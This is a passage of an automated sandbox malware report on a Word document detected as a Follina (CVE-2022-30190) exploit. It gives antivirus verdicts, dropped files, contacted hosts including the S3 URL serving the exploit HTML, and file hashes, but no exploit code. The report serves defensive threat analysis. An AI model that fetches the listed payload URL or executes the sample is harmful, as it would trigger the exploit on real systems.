10->21         started        41 C:\Users\user\AppData\Local\...\5pliokiz.dll, PE32 12->41 dropped 23 cvtres.exe 1 12->23         started        43 C:\Users\user\AppData\Local\...\h34ip5a5.dll, PE32 14->43 dropped 25 cvtres.exe 1 14->25         started        file5 process6 file7 27 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 16->27 dropped 29 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 16->29 dropped

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          icRTA4gcSe.docx48%VirustotalBrowse
          icRTA4gcSe.docx29%MetadefenderBrowse
          icRTA4gcSe.docx62%ReversingLabsDocument-Office.Exploit.CVE-2022-30190
          icRTA4gcSe.docx100%AviraW97M/Dldr.Agent.G1

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm100%AviraJS/CVE-2022-30190.G
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm100%AviraJS/CVE-2022-30190.G
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm100%AviraJS/CVE-2022-30190.G
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dll0%MetadefenderBrowse
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dll0%ReversingLabs
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
          C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.mui0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://roaming.edog.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://officeci.azurewebsites.net/api/0%URL Reputationsafe
          https://my.microsoftpersonalcontent.com0%URL Reputationsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://api.aadrm.com0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
          https://ncus.pagecontentsync.0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-r-w.eu-west-2.amazonaws.com
          		52.95.148.198
          		truefalse
            		high
            sqdocs.s3.eu-west-2.amazonaws.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.htmlfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.diagnosticssdf.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                  		high
                  https://login.microsoftonline.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                    		high
                    https://shell.suite.office.com:1443112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                      		high
                      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                        		high
                        https://autodiscover-s.outlook.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                          		high
                          https://roaming.edog.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                            		high
                            https://cdn.entity.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.addins.omex.office.net/appinfo/query112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                              		high
                              https://clients.config.office.net/user/v1.0/tenantassociationkey112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                		high
                                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                  		high
                                  https://powerlift.acompli.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://rpsticket.partnerservices.getmicrosoftkey.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://lookup.onenote.com/lookup/geolocation/v1112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                    		high
                                    https://cortana.ai112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                      		high
                                      https://cloudfiles.onenote.com/upload.aspx112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                        		high
                                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                          		high
                                          https://entitlement.diagnosticssdf.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                            		high
                                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                              		high
                                              https://api.aadrm.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ofcrecsvcapi-int.azurewebsites.net/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                		high
                                                https://api.microsoftstream.com/api/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                  		high
                                                  https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                    		high
                                                    https://cr.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                      		high
                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      https://portal.office.com/account/?ref=ClientMeControl112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                        		high
                                                        https://graph.ppe.windows.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                          		high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://powerlift-frontdesk.acompli.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://tasks.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                            		high
                                                            https://officeci.azurewebsites.net/api/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              		high
                                                              https://my.microsoftpersonalcontent.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://store.office.cn/addinstemplate112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.aadrm.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                		high
                                                                https://globaldisco.crm.dynamics.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                  		high
                                                                  https://messaging.engagement.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                    		high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                      		high
                                                                      https://dev0-api.acompli.net/autodetect112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.odwebp.svc.ms112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://api.diagnosticssdf.office.com/v2/feedback112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                        		high
                                                                        https://api.powerbi.com/v1.0/myorg/groups112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                          		high
                                                                          https://web.microsoftstream.com/video/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                            		high
                                                                            https://api.addins.store.officeppe.com/addinstemplate112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://graph.windows.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                              		high
                                                                              https://dataservice.o365filtering.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://officesetup.getmicrosoftkey.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://analysis.windows.net/powerbi/api112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                		high
                                                                                https://prod-global-autodetect.acompli.net/autodetect112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://outlook.office365.com/autodiscover/autodiscover.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                  		high
                                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                    		high
                                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                      		high
                                                                                      https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                        		high
                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                          		high
                                                                                          https://ncus.contentsync.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                            		high
                                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                              		high
                                                                                              http://weather.service.msn.com/data.aspx112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                		high
                                                                                                https://apis.live.net/v5.0/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                  		high
                                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                    		high
                                                                                                    https://messaging.lifecycle.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                      		high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                        		high
                                                                                                        https://management.azure.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                            		high
                                                                                                            https://wus2.contentsync.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://incidents.diagnostics.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                              		high
                                                                                                              https://clients.config.office.net/user/v1.0/ios112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                		high
                                                                                                                https://insertmedia.bing.office.net/odc/insertmedia112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                  		high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office365.com/api/v1.0/me/Activities112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                      		high
                                                                                                                      https://api.office.net112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                        		high
                                                                                                                        https://incidents.diagnosticssdf.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                          		high
                                                                                                                          https://asgsmsproxyapi.azurewebsites.net/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policies112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                            		high
                                                                                                                            https://entitlement.diagnostics.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                              		high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                		high
                                                                                                                                https://substrate.office.com/search/api/v2/init112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocation112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://outlook.office365.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://webshell.suite.office.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://substrate.office.com/search/api/v1/SearchHistory112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://management.azure.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://messaging.lifecycle.office.com/getcustommessage16112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://clients.config.office.net/c2r/v1.0/InteractiveInstallation112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://login.windows.net/common/oauth2/authorize112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://graph.windows.net/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://api.powerbi.com/beta/myorg/imports112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://devnull.onenote.com112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://messaging.action.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ncus.pagecontentsync.112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://messaging.office.com/112EFAA6-D7F8-4E62-80E4-7166B76E6F87.0.drfalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  52.95.148.198
                                                                                                                                                                  		s3-r-w.eu-west-2.amazonaws.comUnited States
                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                  52.95.143.42
                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                  		8987AMAZONEXPANSIONGBfalse

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                  Analysis ID:685945
                                                                                                                                                                  Start date and time:2022-08-18 02:00:48 +02:00
                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 8m 46s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:light
                                                                                                                                                                  Sample file name:icRTA4gcSe.docx
                                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                                  Number of analysed new started processes analysed:36
                                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • HDC enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal92.expl.evad.winDOCX@16/30@2/2
                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                  HDC Information:Failed
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .docx
                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                                  • Scroll down
                                                                                                                                                                  • Close Viewer

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe
                                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.191, 52.109.12.21, 20.223.24.244
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  No simulations

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  No context

                                                                                                                                                                  Domains

                                                                                                                                                                  No context

                                                                                                                                                                  ASNs

                                                                                                                                                                  No context

                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                  No context

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  No context

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:Microsoft Access Database
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):528384
                                                                                                                                                                  Entropy (8bit):0.476061474690538
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:OGfX6GJCg+8SFofZ0jGB3R3FxMWJwtZ1Im+hVZO4Fg:9fXdChH4ZVPxJ/lI
                                                                                                                                                                  MD5:AB02519679BCFE27E2AC836CE9798823
                                                                                                                                                                  SHA1:9D0A3CF2D5BE3B6BED8A0791A1C7DCBD8D9A6E2D
                                                                                                                                                                  SHA-256:AD60DD69EB329CD878498AF9F4363952F4A63E898AD4441F61DF05CAEF6F1406
                                                                                                                                                                  SHA-512:2B0D89BCDF57660E21A35C6041C7E0DE447321438330162692BD65D47C76B36B6F2F87317B8C058032144040D802DDEFEF78A2FD49F13949F1494C7238A41F97
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NqU.7...1.(....`.:{6....Z.C8..3..y[e.|*..|......`v!...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36
                                                                                                                                                                  Entropy (8bit):2.730660070105504
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                  MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                  SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                  SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                  SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                  Entropy (8bit):1.4172860556164644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:XXj1HaV:Hj1Hu
                                                                                                                                                                  MD5:A685D690B3E6C2EC585CB78A819D5CF8
                                                                                                                                                                  SHA1:A672FD809D076F8D32161E37AAF40987AE4D3A45
                                                                                                                                                                  SHA-256:7FBF8C133D03FE1C62EB9ACEAEFBEF55227ED55408C9D82033D45F10455924BC
                                                                                                                                                                  SHA-512:D5171BBF378DD09510EA70EF55EB358266FF6DD79869CB690CA653D9A5761F2BEC866DD6946642671C4443BD8204A1C195788C666F508628693B8BFDD17A3644
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:358075. Admin.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\112EFAA6-D7F8-4E62-80E4-7166B76E6F87

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):148061
                                                                                                                                                                  Entropy (8bit):5.358148172589153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:ocQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:L1Q9DQe+zuXYr
                                                                                                                                                                  MD5:7A1020C8A1C0739640B40A7EFEAA5A34
                                                                                                                                                                  SHA1:4102FB207889BE17F2B669F2393519E1EC301EE4
                                                                                                                                                                  SHA-256:86EF343EADB0C49C5EAA00F077DEDA4597EC864FF8C357F6C67DC917348C0915
                                                                                                                                                                  SHA-512:F934CC26D8B0AF9B9C51C97B8461FBE9C84A0B786713A626D9B4DACF4F9B55D955F1A9E2ED919FFEAAF94030DF188B3036EFE314512EFE27DD296FFD7EC62590
                                                                                                                                                                  Malicious:false
